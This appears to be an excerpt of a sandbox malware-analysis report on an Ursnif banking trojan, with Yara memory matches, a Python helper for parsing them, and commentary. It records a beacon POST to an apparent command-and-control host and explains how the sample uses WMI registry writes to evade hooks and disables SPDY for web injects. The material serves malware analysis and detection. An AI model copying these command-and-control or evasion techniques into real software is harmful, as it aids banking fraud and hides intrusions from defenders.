                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: Follow us: www.twitter.com/g5games equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp | String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: Watch us: www.youtube.com/g5enter equals www.youtube.com (Youtube)
                      Source: unknown | HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: art.microsoftsofymicrosoftsoft.at

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
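The identifiers in these source lines already encode most of the injection story: which process index each dump came from, at what base address, and with what page protection. The Python below is an added triage helper for exactly this kind of listing; it is not part of the report and not a Joe Sandbox tool. It assumes (inferred from the lines above, not documented on this page) that memory dumps are named <process index>.<stage>.<counter>.<base address>.<page protection>.<tag>.sdmp with the protection field holding the Windows PAGE_* constants (0x04 PAGE_READWRITE, 0x20 PAGE_EXECUTE_READ, 0x40 PAGE_EXECUTE_READWRITE), and that unpacked PEs are named <index>.<stage>.<image>.<address>.<n>[.raw].unpack. The sample lines are a subset copied from this report.

```python
"""Triage helper for the 'Source: Yara match' lines of a Joe Sandbox report.

Added example; not part of the report and not a Joe Sandbox tool.
Assumed identifier layouts (inferred from the report, not documented there):
  memory dump : <proc-index>.<stage>.<counter>.<base>.<page-protection>.<tag>.sdmp
                with page-protection holding Windows PAGE_* constants
  unpacked PE : <proc-index>.<stage>.<image>.<base>.<n>[.raw].unpack
  process str : Process Memory Space: <image> PID: <pid>
"""
import re
from collections import defaultdict

LINE_RE = re.compile(r"Source: Yara match.*?[Ff]ile source: (?P<src>.+?), type: (?P<type>\w+)\s*$")
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<counter>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<tag>[0-9A-Fa-f]{8})\.sdmp$")
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?\.exe)\.(?P<base>[0-9a-f]+)\.\d+\.(?:raw\.)?unpack$")
MEMSTR_RE = re.compile(r"^Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+)$")

# Windows PAGE_* protection constants (assumed meaning of the fifth dump field).
PAGE_NAMES = {0x02: "R", 0x04: "RW", 0x10: "X", 0x20: "RX", 0x40: "RWX"}


def parse_line(line):
    """Decode one 'Source: Yara match' line into a dict, or None if unrecognised."""
    m = LINE_RE.search(line)
    if not m:
        return None
    src, typ = m.group("src"), m.group("type")
    if typ == "MEMORY":
        d = SDMP_RE.match(src)
        if d:
            prot = int(d.group("prot"), 16)
            return {"type": typ, "proc": int(d.group("proc"), 16),
                    "stage": int(d.group("stage"), 16), "base": int(d.group("base"), 16),
                    "prot": PAGE_NAMES.get(prot, hex(prot))}
    elif typ == "UNPACKEDPE":
        d = UNPACK_RE.match(src)
        if d:
            return {"type": typ, "proc": int(d.group("proc")), "stage": int(d.group("stage")),
                    "image": d.group("image"), "base": int(d.group("base"), 16)}
    elif typ == "MEMORYSTR":
        d = MEMSTR_RE.match(src)
        if d:
            return {"type": typ, "image": d.group("image"), "pid": int(d.group("pid"))}
    return None


def summarize(lines):
    """Group matches by process index.

    Returns (per_proc, named): per_proc maps index -> {"dumps", "rwx_regions",
    "images"}; named maps PID -> image name for the MEMORYSTR matches, which
    identify processes by PID rather than by index."""
    per_proc = defaultdict(lambda: {"dumps": 0, "rwx_regions": set(), "images": set()})
    named = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["type"] == "MEMORYSTR":
            named[rec["pid"]] = rec["image"]
            continue
        entry = per_proc[rec["proc"]]
        entry["dumps"] += 1
        if rec["type"] == "MEMORY" and rec["prot"] == "RWX":
            entry["rwx_regions"].add(rec["base"])
        elif rec["type"] == "UNPACKEDPE":
            entry["images"].add(rec["image"])
    return dict(per_proc), named


def injected_candidates(per_proc):
    """Process indices whose Ursnif-matching memory includes an RWX region.
    The sample's own host processes unpack into RWX too, so correlate the
    indices with the report's process tree before calling a process a victim."""
    return sorted(idx for idx, e in per_proc.items() if e["rwx_regions"])


# Constructed sample: a subset of the source lines from this report.
SAMPLE_LINES = [
    "Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR",
    "Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR",
]

if __name__ == "__main__":
    procs, named = summarize(SAMPLE_LINES)
    for idx in sorted(procs):
        e = procs[idx]
        print(f"proc 0x{idx:02X}: {e['dumps']} dump(s), RWX at "
              f"{[hex(b) for b in sorted(e['rwx_regions'])]}, unpacked from {sorted(e['images'])}")
    print("RWX candidates:", [hex(i) for i in injected_candidates(procs)])
    print("named by PID:", named)
```

Run over the full list above, the pattern that stands out is the stage-0 RWX dumps at page-aligned bases for indices 0x22, 0x25, 0x2D, 0x2E and 0x30, each followed by a stage-2 RX dump at base + 0x1000: memory allocated writable and executable, filled, and then matched as an unpacked image with its code section behind a header page. That is what a written-in payload looks like from the outside. The MEMORYSTR lines name processes by PID, not index, so mapping those indices to RuntimeBroker.exe, control.exe or cmd.exe still needs the report's process tree.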

                      E-Banking Fraud:

Yara detected Ursnif
Source: Yara match, file sources: identical to the list of memory dumps, process memory spaces and unpacked PE images immediately above.
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe, Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
The value is written from explorer.exe, one of the processes the Ursnif Yara rule matched in memory above. Setting EnableSPDY3_0 to 0 keeps Internet Explorer on plain HTTP/1.1 instead of a multiplexed, header-compressed SPDY session, so Ursnif's browser hooks can parse and rewrite each request and response for its web injects.
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00DD3FAB
The second source is a CryptoAPI routine in the sample that imports a key blob and both encrypts and decrypts with it; the report lists it under this signature without saying what data it protects.

                      System Summary:

Writes or reads registry keys via WMI
StdRegProv is the WMI registry provider in the root\default namespace. Driving it through IWbemServices::ExecMethod means the registry operation is carried out by the WMI provider host (WmiPrvSE.exe) rather than by the sample's own process, so user-mode hooks on the Reg* APIs inside loaddll32.exe never see the write, and per-process registry telemetry attributes it to WmiPrvSE.exe.
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B2274
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD2654
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD7E30
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD4FA7
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04572C07
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04572499
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04565518
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0456AD2E
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0457C5F4
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04574658
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0456279B
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_045788BB
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0456E9BD
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04564AFE
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_045852A0
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04582339
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB2499
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB2C07
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BBC5F4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BAAD2E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA5518
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB4658
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA279B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BB88BB
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BAE9BD
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BC52A0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA4AFE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BC2339
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A77E30
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A72654
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A74FA7
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093F2F0
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093B530
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093179C
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0094508C
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_009340B4
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0094E0CF
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00923804
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0092E008
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00937834
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0094C874
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00929074
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00933074
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_00944988
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_009459A8
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093D9AC
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093C1D4
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0092B1D8
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093C9F0
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0093D150
                      Source: C:\Windows\System32\control.exe | Code function: 34_2_0094D2DC
